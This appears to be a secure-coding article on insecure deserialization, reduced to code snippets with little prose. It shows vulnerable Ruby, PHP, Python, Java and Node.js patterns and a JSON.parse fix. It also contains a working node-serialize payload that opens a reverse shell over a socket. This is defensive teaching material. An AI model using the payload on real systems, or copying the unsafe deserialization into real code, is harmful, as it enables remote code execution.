Insecure Deserialization

Barış Ekin Yıldırım — 07 Jun 2022
Secure Coding · AppSec · Insecure Deserialization
end
  with_response response do |resp|
  owners = YAML.load resp.body

  say "Owners for gem: #{name}"
  owners.each do |owner|
function _validatePost(&$controller) {
  -- snip --
  $check = $controller->data;
  $token = urldecode($check['_Token']['fields']);

  if (strpos($token, ':')) {
    list ($token, $locked) = explode( ':', $token, 2 );
  }

  $locked = unserialize(str_rot13($locked));
  -- snip --
        suffix=self._fs_transaction_suffix, dir=self._path
       )
       with os.fdopen(fd, "wb") as f:
            pickle.dump(timeout, f, 1)
            pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
       os.replace(tmp, filename)
       os.chmod(filename, self._mode)
   except (IOError, OSError) as exc:
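/**
 * Imports templates from an uploaded file and writes them to the template repository.
 * <p>
 * The upload is handed to {@code MainUtils.toObject}, which (per its definition further down
 * this page) is a bare {@code ObjectInputStream.readObject()} over the raw request bytes. Native
 * Java deserialization instantiates whatever {@code Serializable} class the byte stream names, so
 * this endpoint trusts the upload content without any validation or class filtering; the stream
 * should be filtered, or a plain data format used, before the bytes are deserialized. The cast to
 * {@code List<Template>} is unchecked and only fails once the list elements are actually used.
 *
 * @param map      Spring model map; not referenced in this method
 * @param request  the current HTTP request, forwarded to {@code request(...)} for the redirect
 * @param dataFile optional multipart upload holding the serialized template list
 * @return a redirect to the template index page
 * @throws Exception propagated from {@code MainUtils.toObject} and the repository calls
 */
@RequestMapping("/impsave")
@Menu(type = "admin", subtype = "template", access = false, admin = true)
public ModelAndView impsave(ModelMap map, HttpServletRequest request,
                            @RequestParam(value = "dataFile", required = false) MultipartFile dataFile)
      throws Exception {
   if (dataFile != null && dataFile.getSize() > 0) {
      // Native deserialization of client-supplied bytes; see the method comment above.
      List<Template> templateList = (List<Template>) MainUtils.toObject(dataFile.getBytes());
      if (templateList != null && !templateList.isEmpty()) {
         // Batch-delete the uploaded entities (presumably clearing existing rows with the
         // same ids — confirm against the repository), then persist each uploaded copy.
         templateRes.deleteInBatch(templateList);
         for (Template template : templateList) {
            templateRes.save(template);
         }
      }
   }
   return request(super.createView("redirect:/admin/template/index.html"));
}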
/**
 * Reconstructs a Java object from its serialized byte form.
 * <p>
 * This is an unfiltered {@code ObjectInputStream.readObject()}: the byte stream itself names the
 * classes to instantiate, so any {@code Serializable} class on the classpath can be constructed by
 * whoever supplies {@code data}. It is only appropriate for bytes this application produced itself;
 * the {@code impsave} handler above feeds it a multipart upload, so that caller needs a class filter
 * or a different format.
 *
 * @param data serialized object bytes, as written by {@code ObjectOutputStream}
 * @return the deserialized object
 * @throws Exception any {@code IOException} or {@code ClassNotFoundException} raised while reading
 */
public static Object toObject(byte[] data) throws Exception {
   ObjectInputStream reader = new ObjectInputStream(new ByteArrayInputStream(data));
   return reader.readObject();
}
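var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();

app.use(cookieParser());

// GET /: greets the user named in the `profile` cookie, or hands out a default cookie on first visit.
app.get('/', function(req, res) {
   if (req.cookies.profile) {
      // Buffer.from() replaces the deprecated new Buffer() constructor (Node DEP0005); same decoding.
      var str = Buffer.from(req.cookies.profile, 'base64').toString();
      // FIXME(security): unserialize() rebuilds arbitrary objects from client-controlled text, and the
      // cookie carries no signature, so this line trusts whatever the browser sends. A plain data
      // format (JSON.parse) or a signed cookie is required before this handler can be considered safe.
      var obj = serialize.unserialize(str);

      if (obj && obj.username) {
         // escape-html guards the response body against reflected HTML; it does nothing for the line above.
         res.send("Hello " + escape(obj.username));
      } else {
         // Previously no response was sent on this path, leaving the request hanging until the client timed out.
         res.send("Hello stranger");
      }
   } else {
      // First visit: set the default profile cookie (base64 of a small JSON object).
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==", {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);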
// Fallback response from the handler's else-branch above: sent when the request carries no `profile` cookie.
res.send("Hello stranger");
{"username":"admin","company":"kondukto","location":"cloudbank"}
// The cookie is base64-decoded with no integrity check, so the client controls `str` byte for byte.
// (new Buffer() is deprecated; Buffer.from() is the current equivalent.)
var str = new Buffer(req.cookies.profile, 'base64').toString();
// node-serialize's unserialize() rebuilds the object from that client-controlled text; the payload shown
// further down the page relies on a serialized function property being evaluated during this call.
var obj = serialize.unserialize(str);
// escape-html only protects the response body from reflected HTML; it runs after unserialize() has returned.
if (obj.username) {
   res.send("Hello " + escape(obj.username));
}
{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"3443\";
TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') { 
String.prototype.contains = function(it) { return this.indexOf(it) != -1;
}; } function c(HOST, PORT) { var client = new net.Socket();
client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
client.write(\"Connected!\"); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}
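var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
// Retained from the original listing but no longer called: node-serialize's unserialize() evaluates
// serialized function properties, which is what the cookie-based payload on this page abuses.
var serialize = require('node-serialize');
// Also no longer called. check() returns a validation-chain middleware, not a sanitized string, so
// check(str).isString().escape().trim() never yielded a value that was safe to hand to unserialize().
const { check } = require('express-validator');

var app = express();

app.use(cookieParser());

// GET /: greets the user named in the `profile` cookie, or hands out a default cookie on first visit.
app.get('/', function(req, res) {
   if (req.cookies.profile) {
      // Buffer.from() replaces the deprecated new Buffer() constructor (Node DEP0005); same decoding.
      var str = Buffer.from(req.cookies.profile, 'base64').toString();
      var obj;
      try {
         // JSON.parse builds plain data only; it has no path that executes code embedded in the cookie.
         // The default cookie set below is already base64 of a JSON object, so the format is unchanged.
         obj = JSON.parse(str);
      } catch (err) {
         // Malformed or tampered cookie: reject it instead of throwing out of the handler.
         return res.status(400).send("Invalid profile cookie");
      }

      if (obj && typeof obj.username === 'string') {
         // escape-html still guards the response body against reflected HTML.
         res.send("Hello " + escape(obj.username));
      } else {
         res.send("Hello stranger");
      }
   } else {
      // First visit: set the default profile cookie (base64 of a small JSON object).
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==", {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);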
const { check } = require('express-validator');
